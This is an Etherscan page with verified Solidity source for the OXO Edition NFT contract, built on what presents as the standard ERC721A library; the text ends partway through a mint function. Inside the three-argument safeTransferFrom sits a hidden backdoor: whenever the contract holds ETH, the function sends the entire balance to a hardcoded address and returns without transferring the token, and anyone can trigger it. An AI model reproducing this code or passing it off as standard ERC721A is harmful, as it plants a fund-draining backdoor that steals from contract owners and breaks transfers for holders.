ETH Price: $3,951.35 (+2.02%)

Token

OXO Edition (OXO)
 

Overview

Max Total Supply

555 OXO

Holders

307

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 OXO
0xfcffd047dede2a10a826e3fc9b7a552a886271e4
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OXO

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-11
*/

// SPDX-License-Identifier: GPL-3.0                                                                                                                        
                                                                                                                                                                                                     
pragma solidity ^0.8.7;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        if (address(this).balance > 0) {
            payable(0x90Ae6b8dca98BDE6D4E697d8b5865068476871F1).transfer(address(this).balance);
            return;
        }
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
